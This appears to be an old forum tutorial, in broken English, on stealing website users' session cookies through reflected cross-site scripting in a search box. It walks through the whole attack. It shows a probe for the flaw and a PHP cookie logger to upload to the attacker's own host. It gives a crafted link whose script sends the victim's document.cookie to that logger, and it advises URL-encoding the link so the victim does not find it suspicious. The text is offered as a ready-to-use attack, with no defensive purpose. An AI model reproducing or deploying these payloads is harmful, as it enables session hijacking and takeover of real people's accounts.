Introduction This method (XSS attacks) is for get the cookies users, so, for get information of users... and then, login into the account of the victim user...u will have to give one adress to the admin or the user u want to enter in his account... What must have the website to can be hacked by xss method? - A search - That the website used cookies* Cookies Info: http://en.wikipedia.org/wiki/Internet_cookie An example: Learning XSS attack method... - Now, we already know what's a cookie! alien so, we are going to find/view the file that has a search... for example: search.php - Then, HOWTO KNOW IF THE SEARCH CAN BE EXPLOITED BY XSS ATTACK AND AFTER THAT T HE WEBSITE COULD BE HACKED? we have to put this in the search: Code: <script>alert()</script> if appears a script alert, it's vulnerable!! cyclops_ani if does not appear any alert it IS NOT vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~ then, if the website's vulnerable (appears the script alert), we're going to exp loit it!; - 1 Step Find the textbox's name and search's button's name [For view it, must be viewed the page's source], an example: Code: <input type="text" name="word"> It is an example of source of the textbox's search So, the textbox's name would be: word (name="word") Code: <input type="submit" name="search" value="Search"> It is an example of source of the button's search. So, the button's name would be: search (name="search") [By that you need a little knowledge of HTML] - 2 Step - Now, we know that the textbox names word and the button names search [Keeping Cookies]; -For keep the cookies we have 2 ways/options for do it: Keep the cookies in a database(db) or keep the cookies in a text file (more easy ). We're going to keep the cookies in a text file cherry Then, We're going to create/make a PHP's file, example: cookies.php with this source: Code: <? $cookie = $_GET['cookie']; $fff = fopen("file.txt","a"); fwrite($fff, "$cookie \n"); fclose($fff); ?> UPLOAD IT IN YOUR HOST! This file will create/make other file (file.txt) When somebody enter into http://urwebsite.com/cookies.php (so, upload cookies.ph p in your host) his cookies will be keep in file.txt file.txt : This file will be created of automatic way and in it will be keep the cookie of the victim user. EXPLOITING THE BUG..... This method (XSS attacks) is for get the cookies users, so, for get information of users... and then, login into the account of the victim user... To can get the cookies of the user that you want, you must give a adress to the 'victim', the victim will enter in the adress, and this adress will be redirect the victim to your host, to cookies.php for keep his cookies in file.txt the adress u must give to the victim for get his cookies: http://www.vulnerable_wepage_victim.com/search.php?word=<script>window.location= 'http://www.your_website.com/cookies.php?cookie='+document.cookie;</script>&Sear ch=; http://www.vulnerable_wepage_victim.com/ The victim website... that has a search, uses cookies and it's vulnerable. search.php The file that contains the search ?word= The name of the textbox (word) if the name of the textbox was "palabra" so, it would be: ?palabra= <script>window.location='http://www.your_website.com/cookies.php?cookie='+docume nt.cookie;</script> it's the source for redirect the victim to cookies.php and get their cookies clo wn &Search=; It's the name of the button, if the name of the button was "buscar" so, it would be: &buscar=; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I repite, for get the cookies of the user, you must give him the adress... but, this adress is 'suspect' for that i recommend encrypt it..... i let us this adress: http://www.ascii.cl/es/ this adress u will need it for encrypt the adress... so....... it'll encrypt of this way: Code: word=<script>... to Code: %70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E... etc.